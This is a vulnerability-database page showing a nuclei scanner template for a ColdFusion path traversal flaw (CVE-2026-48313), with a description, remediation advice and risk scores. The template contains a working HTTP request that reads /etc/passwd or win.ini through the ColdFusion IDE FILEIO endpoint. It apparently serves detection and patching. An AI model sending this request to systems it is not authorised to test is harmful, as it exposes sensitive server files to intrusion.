Lucene search
K

ColdFusion - Path Traversal

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 2 Views

ColdFusion path traversal allows reading arbitrary files and limited writes outside the restricted directory.

Related
Refs
Code
id: CVE-2026-48313

info:
  name: ColdFusion - Path Traversal
  author: watchtowr,DhiyaneshDk
  severity: high
  description: |
    ColdFusion versions 2025.9, 2023.20 and earlier are affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could lead to arbitrary file system read and limited write access. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue does not require user interaction. Scope is changed.
  impact: |
    Attackers can read sensitive files and write limited files outside intended directories, risking data exposure and modification.
  remediation: |
    Update to the latest version beyond 2025.9 or 2023.20.
  reference:
    - https://labs.watchtowr.com/its-37oc-and-all-we-can-think-about-is-coldfusion-adobe-coldfusion-security-bulletin-apsb26-68-cve-bonanza/
  metadata:
    verified: true
    max-request: 2
    fofa-query: app="Adobe-ColdFusion"
  tags: cve,cve2026,lfi,adobe,coldfusion

http:
  - raw:
      - |
        POST /CFIDE/main/ide.cfm?ACTION=FILEIO HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        2:{{len}}:{{path}}000004:READ

    payloads:
      path:
        - 'C:\Windows\win.ini'
        - '/etc/passwd'
      len:
        - '000018'
        - '000011'

    attack: pitchfork

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '[fonts]'
          - 'root:x:0:0:'
        condition: or

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b82a4142b6a0b7e63ad0f3eae6931913eba50f6414d39ed6d18c9f0cab4dfd8c022100966354bcf2f7253f095a0d5e5b70f9025446b375336d5d9af8aa39ffbfd67a57:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Jul 2026 15:30Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.19.3
EPSS0.00479
SSVC
2